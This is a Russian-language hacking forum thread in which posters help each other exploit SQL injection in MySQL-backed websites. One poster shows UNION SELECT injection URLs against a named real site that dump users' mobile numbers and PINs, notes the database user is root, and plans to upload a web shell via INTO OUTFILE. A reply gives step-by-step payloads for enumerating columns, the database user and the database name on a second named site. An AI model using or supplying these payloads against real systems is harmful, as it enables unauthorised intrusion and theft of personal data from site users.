ANTICHAT — форум по информационной безопасности, OSINT и технологиям

можно выбирать только из той же таблицы, в которой присутствует иньекция.. или если file_priv есть то можно читать файлы

https://forum.antichat.ru/showpost.php?p=565034&postcount=4

__________________

полезного особо не вынешь, можно конечно, смотря из какой таблицы выборка идет, например если это таблица аккаунтов пользователя, то можно и пароли поиметь, но это редко случается, также при очень удачном раскладе и шелл можно залить с помощью into outfile например выборка идет из той таблицы, куда ты можешь добавлять что-то, например комментарии, при наличии файл прив ну и всех факторов для залития через into outfile шелл бдует залит

__________________
Карфаген должен быть разрушен...

Macro
"SQL инъекция в MySQL сервере третей версии"
_http://www.securitylab.ru/contest/212101.php

У меня вопрос по SQL ... Нашел скуль, но вывод ответа от SQL сервера на страницу всего выводит по 1 строчке. Я сразу заюзал limit пример

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+lim it+1,1/*

выводит все гуд. Потом делаю так

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+lim it+2,1/*

гуд потом

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+lim it+100,1/*

писит что ошибка... Потом я пробую так

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+lim it+1,100/*

То мне вывождит на страницу 100 номеров + пины к ним... Знаю что юзеров 12к

http://sute.ru/index.php?id=-1 union select 1,2,3,4,5,mobile_num,7,8,pin+from+mobile_users+lim it+12000,1/*

Так пашет гуд... соответственно и должно примерно быть около 8-9к номеров мобил...

Суть вопрос в том почему когда я вывожу юзеров то лимит пашет как обычно

12000,1/*

а когда вывожу номер мобил то

1,9000/*

select count(mobile_num) from mobile_users

__________________
..

Тааак юзверь на счастье оказался root
Будем пробовать шелл Спасибо, честно говоря, не подумал об этом.
Как ни странно, есть все необходимое, и файл прив и добавлять вроде как можно.

Вопрос опять по SQL.
Имеется вот такой адрес:
_http://fhplus.ru/gostevaya/index.php?page=1
Если ставлю кавычку после 1, то ошибки никакой не выводит, а вот если 1 убрать и поставить кавычку (вот так :
_http://fhplus.ru/gostevaya/index.php?page='
то выводит ошибку вида -
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 1
То есть как мне кажется инъекция есть, но вот составить правильный запрос опять не могу, поскольку нахожусь в процессе обучения и не всё ещё ясно до конца просьба помочь в правильном составлении запроса всем кто может конечно и главное хочет.
Как мне кажется опять ответ есть в сообщении о ошибке, а именно '-20, 20', но как это пристроить в запрос...?
Заранее спасибо и благодарности всем кто подскажет.

Климент_Ворошилов
20,-20 это колво допустимых строниц если брать значение больше 22 то выводит пустую 20,-20 сдесь не имеет отношение к скулю
попробуй подобрать кол во таблиц
http://fhplus.ru/gostevaya/index.php?page='+union+select+1,2,3,....стока цифр пока не исчезнет ошибка..../*
дальше меняй значение ?page='+union+select+user(),2,3,....стока цифр пока не исчезнет ошибка..../*
выведет юзера в бд
?page='+union+select+database(),2,3,....стока цифр пока не исчезнет ошибка..../*
имя бд
и тд
прочитай фак там всё написано...

ничего не получится . т.к. там явно идут некие математические действия с тем что в переменную передается)

__________________